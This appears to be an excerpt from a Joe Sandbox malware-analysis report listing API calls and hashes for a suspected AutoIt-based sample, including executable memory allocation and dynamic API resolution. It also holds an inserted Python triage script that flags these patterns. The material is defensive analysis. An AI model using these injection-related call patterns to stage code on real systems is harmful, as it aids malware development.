                                                                    • String ID: Listbox
                                                                    • API String ID: 3315199576-2633736733
                                                                    • Opcode ID: ad5808ca38056986609b186189c78edd72f95baa95ead05602f8d9649be99f6c
                                                                    • Instruction ID: 318a15d2de13aae33c58c99566ebf329a12fe65dc98d2c41645946b7f27b5578
                                                                    • Opcode Fuzzy Hash: ad5808ca38056986609b186189c78edd72f95baa95ead05602f8d9649be99f6c
                                                                    • Instruction Fuzzy Hash: 4B219232610118BFDF118F54DC49FBB3BBAEF89750F118129F9659B1E0C6719C5197A0
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00C97772
                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00C97787
                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00C97794
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: msctls_trackbar32
                                                                    • API String ID: 3850602802-1010561917
                                                                    • Opcode ID: 0d60aa055bfd05fb5366f05bdcdb914d39535e85ebbd1f54c4dad1c8cae214f9
                                                                    • Instruction ID: d1ccb05bb15a4cc4df1cfa5507ef82e1d07025ab05b9f0949e4b4b57a52b55c3
                                                                    • Opcode Fuzzy Hash: 0d60aa055bfd05fb5366f05bdcdb914d39535e85ebbd1f54c4dad1c8cae214f9
                                                                    • Instruction Fuzzy Hash: 06113A72210208BFEF255FA1CC09FEB3768EF88B54F11422CFA5192090C271E811DB10
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00C14BD0,?,00C14DEF,?,00CD52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C14C11
                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C14C23
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                    • API String ID: 2574300362-3689287502
                                                                    • Opcode ID: 79791ea41701a6d81eb6df438fdb402481d66dd76a7aaafb609f18c997d24467
                                                                    • Instruction ID: b2b47bb9605ee01de0b633b3d7281260b3154a55cee90a132316e62cf8e06b8b
                                                                    • Opcode Fuzzy Hash: 79791ea41701a6d81eb6df438fdb402481d66dd76a7aaafb609f18c997d24467
                                                                    • Instruction Fuzzy Hash: B4D01731611713CFDB20AFB1D91CB4ABAE5EF0A352B118C3ED496D6160E6B0D9C1CA90
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00C14B83,?), ref: 00C14C44
                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C14C56
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                    • API String ID: 2574300362-1355242751
                                                                    • Opcode ID: b043039cd2c1c7a0705b4a40515517551f22e1aa62a2bc3c2258239560a007ec
                                                                    • Instruction ID: f13eb50e1c1185ebd1ba98559b0b947af9b102e15c1abd0bee8cae8c7c73b749
                                                                    • Opcode Fuzzy Hash: b043039cd2c1c7a0705b4a40515517551f22e1aa62a2bc3c2258239560a007ec
                                                                    • Instruction Fuzzy Hash: 9BD01731610713CFDB249F31D92C74E7AE4AF06351B21883ED4A6DA560E770D9C0DA90
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00C91039), ref: 00C90DF5
                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C90E07
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                    • API String ID: 2574300362-4033151799
                                                                    • Opcode ID: f35a110a06339770b0c1e79945a9d00f79271bd4ff4894df43a86dcce9163cd3
                                                                    • Instruction ID: e14fab4d990f4fd9084955d4eec83c9691a6557bef98b11a5a5dd31cd8cf428f
                                                                    • Opcode Fuzzy Hash: f35a110a06339770b0c1e79945a9d00f79271bd4ff4894df43a86dcce9163cd3
                                                                    • Instruction Fuzzy Hash: DCD01771510722CFDB209F75D80CB8AB6E5AF05352F218C7ED4D6D2161EAB0D9D0CA90
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00C88CF4,?,00C9F910), ref: 00C890EE
                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00C89100
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                    • API String ID: 2574300362-199464113
                                                                    • Opcode ID: db83a498d830440c52e67e96be4b0385bf7d76777556500cf80822d9bd732503
                                                                    • Instruction ID: f93aea3750dd1d282e4adea9467ad80f52dd34d6f0f046bd7fca61916dfe4e4b
                                                                    • Opcode Fuzzy Hash: db83a498d830440c52e67e96be4b0385bf7d76777556500cf80822d9bd732503
                                                                    • Instruction Fuzzy Hash: 32D01735614723CFDB20AF71D81C71E76E4AF05355B16883ED496D65A0EB70C880CB90
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: LocalTime__swprintf
                                                                    • String ID: %.3d$WIN_XPe
                                                                    • API String ID: 2070861257-2409531811
                                                                    • Opcode ID: fa366ab87c1b12cd8d77dcd149279d65daf1fe9b9e96169bef06a0a44d9ed0bb
                                                                    • Instruction ID: e408951abc613d420101a176eb3b3f08ef424e3e9366d597fed05e3952c350e8
                                                                    • Opcode Fuzzy Hash: fa366ab87c1b12cd8d77dcd149279d65daf1fe9b9e96169bef06a0a44d9ed0bb
                                                                    • Instruction Fuzzy Hash: 25D01779844108FACB009B96988DFFD777CAB0D382F181462FC06E2040E2318BD9EA29
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2c7456cffe0761f051c21db22a16a9f5473ee32f80362d4bf1cede0697c5f657
                                                                    • Instruction ID: b943913267d2342bce800a7abe144941251e86c72d86d97ed5b506b6f6bf12aa
                                                                    • Opcode Fuzzy Hash: 2c7456cffe0761f051c21db22a16a9f5473ee32f80362d4bf1cede0697c5f657
                                                                    • Instruction Fuzzy Hash: 1BC16275A04215EFCB24CFA4C888EAEBBB5FF48718B154A98E815DB351D730DE81DB90
                                                                    APIs
                                                                    • CharLowerBuffW.USER32(?,?), ref: 00C8E0BE
                                                                    • CharLowerBuffW.USER32(?,?), ref: 00C8E101
                                                                      • Part of subcall function 00C8D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00C8D7C5
                                                                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00C8E301
                                                                    • _memmove.LIBCMT ref: 00C8E314
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharLower$AllocVirtual_memmove
                                                                    • String ID:
                                                                    • API String ID: 3659485706-0
                                                                    • Opcode ID: d5efa3809001d6cdc8432b9219843acdec6e344604b0be749b535b23c0fb6985
                                                                    • Instruction ID: 915f07d761c89f33fd0227bd7bb3642f090449480b81d46b71f5ba3357d4aa6c
                                                                    • Opcode Fuzzy Hash: d5efa3809001d6cdc8432b9219843acdec6e344604b0be749b535b23c0fb6985
                                                                    • Instruction Fuzzy Hash: 6FC14A71608301DFC714EF28C490A6ABBE4FF89718F14896DF8999B351D731EA46CB86
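The two records of most interest in this stretch of the listing are the GetProcAddress resolutions (Wow64DisableWow64FsRedirection, Wow64RevertWow64FsRedirection, RegDeleteKeyExW, GetModuleHandleExW) and the function directly above, which calls VirtualAlloc with flAllocationType 0x3000 (MEM_COMMIT|MEM_RESERVE) and flProtect 0x40 (PAGE_EXECUTE_READWRITE) and then _memmove, i.e. it copies bytes into freshly allocated executable memory. The Python script below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses function records in the report's own bullet layout ("• Api.MODULE(args), ref: addr", "• Opcode ID: …", "• Instruction Fuzzy Hash: …") and flags RWX allocations, RWX allocations followed by a copy routine, and exports resolved by name. SAMPLE_REPORT is a constructed excerpt assembled from entries on this page; the WATCHLIST set, the COPY_ROUTINES set and the rule names are the example's own assumptions. Caveat for triage: the sample is a compiled AutoIt script, and the AutoIt runtime itself resolves the Wow64 redirection functions dynamically and allocates executable memory for its own purposes, so a hit here is a lead to correlate with the injection and syscall signatures in the overview, not a verdict on its own.

```python
import re
from dataclasses import dataclass
from typing import Optional

PAGE_EXECUTE_READWRITE, MEM_COMMIT, MEM_RESERVE = 0x40, 0x1000, 0x2000  # VirtualAlloc constants
COPY_ROUTINES = {"_memmove", "_memcpy", "memcpy", "memmove"}              # assumed set
# Assumed watchlist of exports whose by-name resolution deserves a look; extend to taste.
WATCHLIST = {"Wow64DisableWow64FsRedirection", "Wow64RevertWow64FsRedirection"}

# Constructed excerpt in the report's bullet layout, copied from entries on this page.
SAMPLE_REPORT = """\
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00C14BD0,?,00C14DEF,?,00CD52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C14C11
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C14C23
• Opcode ID: 79791ea41701a6d81eb6df438fdb402481d66dd76a7aaafb609f18c997d24467
• Instruction Fuzzy Hash: B4D01731611713CFDB20AFB1D91CB4ABAE5EF0A352B118C3ED496D6160E6B0D9C1CA90
APIs
• CharLowerBuffW.USER32(?,?), ref: 00C8E0BE
  • Part of subcall function 00C8D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00C8D7C5
• VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00C8E301
• _memmove.LIBCMT ref: 00C8E314
• Opcode ID: d5efa3809001d6cdc8432b9219843acdec6e344604b0be749b535b23c0fb6985
• Instruction Fuzzy Hash: 6FC14A71608301DFC714EF28C490A6ABBE4FF89718F14896DF8999B351D731EA46CB86
"""

# "• Name.MODULE(a,b), ref: ADDR" or "• _memmove.LIBCMT ref: ADDR", optionally prefixed
# with "Part of subcall function XXXX:".
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"([A-Za-z_]\w*)\.(\w+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)\s*$")
FIELD_RE = re.compile(r"^\s*•\s*(Opcode ID|Instruction Fuzzy Hash):\s*(\S+)")
HEX8_RE = re.compile(r"^[0-9A-Fa-f]{8}$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list      # raw tokens as printed; "?" means the analyzer could not resolve the value
    ref: int        # call-site address
    subcall: bool   # True for "Part of subcall function" entries

    def hex_arg(self, i: int) -> Optional[int]:
        """Argument i as an int if it was printed as 8 hex digits, else None."""
        if i < len(self.args) and HEX8_RE.match(self.args[i]):
            return int(self.args[i], 16)
        return None


def parse_records(text: str) -> list:
    """Split report text into {'calls': [...], 'ident': opcode-id prefix} records;
    a record closes at its Instruction Fuzzy Hash line."""
    records, cur = [], {"calls": [], "ident": "?"}
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if m:
            name, module, raw_args, ref = m.groups()
            args = [a.strip() for a in raw_args.split(",")] if raw_args else []
            cur["calls"].append(ApiCall(name, module, args, int(ref, 16),
                                        "Part of subcall function" in line))
            continue
        m = FIELD_RE.match(line)
        if m and m.group(1) == "Opcode ID":
            cur["ident"] = m.group(2)[:16]
        elif m:                                   # Instruction Fuzzy Hash ends the record
            records.append(cur)
            cur = {"calls": [], "ident": "?"}
    if cur["calls"]:                              # tolerate a truncated final record
        records.append(cur)
    return records


def triage(records: list) -> list:
    """Return (rule, function, detail) tuples for RWX allocations and by-name resolutions."""
    findings = []
    for rec in records:
        calls, ident = rec["calls"], rec["ident"]
        for c in calls:
            if c.subcall:
                continue                          # subcall hits belong to their own record
            if c.name == "VirtualAlloc" and c.hex_arg(3) == PAGE_EXECUTE_READWRITE:
                size, flags = c.hex_arg(1), c.hex_arg(2) or 0
                detail = "size=" + (f"0x{size:x}" if size is not None else "?")
                if flags & MEM_COMMIT and flags & MEM_RESERVE:
                    detail += " MEM_COMMIT|MEM_RESERVE"
                findings.append(("rwx_alloc", ident, detail + " PAGE_EXECUTE_READWRITE"))
                # A copy routine after the allocation is the classic staging shape.
                if any(not d.subcall and d.ref > c.ref and d.name in COPY_ROUTINES for d in calls):
                    findings.append(("rwx_alloc_then_copy", ident, f"copy follows alloc at 0x{c.ref:08X}"))
            elif c.name == "GetProcAddress" and len(c.args) > 1:
                target = c.args[1]
                if target != "?" and not HEX8_RE.match(target):   # literal export name
                    rule = "dynamic_resolve_watchlist" if target in WATCHLIST else "dynamic_resolve"
                    findings.append((rule, ident, target))
    return findings


if __name__ == "__main__":
    for rule, fn, detail in triage(parse_records(SAMPLE_REPORT)):
        print(f"{rule:26} fn={fn}  {detail}")
```

Run it against the text of a whole report (copy the function listing into a file and pass it to parse_records) to get one line per hit keyed by the first 16 hex digits of the Opcode ID, which is enough to find the record again on the page. Subcall entries are skipped deliberately: the same call is listed again under its own function, so counting it twice would inflate the result.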
                                                                    APIs
                                                                    • CoInitialize.OLE32(00000000), ref: 00C880C3
                                                                    • CoUninitialize.OLE32 ref: 00C880CE
                                                                      • Part of subcall function 00C6D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C6D5D4
                                                                    • VariantInit.OLEAUT32(?), ref: 00C880D9
                                                                    • VariantClear.OLEAUT32(?), ref: 00C883AA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                    • String ID:
                                                                    • API String ID: 780911581-0
                                                                    • Opcode ID: 89eb0be710d9acdd99d0b3382f4f5591f0838adbb14d7b7e5cfe3bd174a9c9b8
                                                                    • Instruction ID: b8f3013293b3aaeb1246c70201d22d1145f2541510dbd82bc9cf200fc1ae5ba5
                                                                    • Opcode Fuzzy Hash: 89eb0be710d9acdd99d0b3382f4f5591f0838adbb14d7b7e5cfe3bd174a9c9b8
                                                                    • Instruction Fuzzy Hash: 93A188352047019FDB10EF14C495B6AB7E4FF8A318F448418F99A9B7A1CB30ED45EB86
                                                                    APIs
                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00CA2C7C,?), ref: 00C676EA
                                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00CA2C7C,?), ref: 00C67702
                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,00C9FB80,000000FF,?,00000000,00000800,00000000,?,00CA2C7C,?), ref: 00C67727
                                                                    • _memcmp.LIBCMT ref: 00C67748
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: FromProg$FreeTask_memcmp
                                                                    • String ID:
                                                                    • API String ID: 314563124-0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$AllocClearCopyInitString
                                                                    • String ID:
                                                                    • API String ID: 2808897238-0
                                                                    APIs
                                                                    • GetWindowRect.USER32(017BEB70,?), ref: 00C99863
                                                                    • ScreenToClient.USER32(00000002,00000002), ref: 00C99896
                                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00C99903
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ClientMoveRectScreen
                                                                    • String ID:
                                                                    • API String ID: 3880355969-0
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00C69AD2
                                                                    • __itow.LIBCMT ref: 00C69B03
                                                                      • Part of subcall function 00C69D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00C69DBE
                                                                    • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00C69B6C
                                                                    • __itow.LIBCMT ref: 00C69BC3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$__itow
                                                                    • String ID:
                                                                    • API String ID: 3379773720-0
                                                                    APIs
                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00C869D1
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00C869E1
                                                                      • Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
                                                                      • Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC
                                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00C86A45
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00C86A51
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$__itow__swprintfsocket
                                                                    • String ID:
                                                                    • API String ID: 2214342067-0
                                                                    APIs
                                                                    • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00C9F910), ref: 00C864A7
                                                                    • _strlen.LIBCMT ref: 00C864D9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _strlen
                                                                    • String ID:
                                                                    • API String ID: 4218353326-0
                                                                    APIs
                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00C7B89E
                                                                    • GetLastError.KERNEL32(?,00000000), ref: 00C7B8C4
                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00C7B8E9
                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00C7B915
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
